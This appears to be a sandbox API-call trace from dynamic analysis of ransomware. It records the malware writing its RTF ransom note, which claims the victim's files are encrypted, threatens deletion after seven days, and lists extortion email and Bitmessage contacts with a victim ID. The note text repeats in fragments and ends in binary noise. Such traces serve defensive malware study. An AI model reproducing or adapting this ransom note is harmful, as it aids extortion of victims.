Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.497] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\np¬WøÖ37\x1c\rx\x0b\x80¯5\x8c\x9cû)'\x9cý\x0e\x0f3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0286.497] WriteFile (in: hFile=0x2f0, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.498] CloseHandle (hObject=0x2f0) returned 1 [0286.498] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\#readme_eman#.rtf")) returned 0xffffffff [0286.498] GetLastError () returned 0x2 [0286.498] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 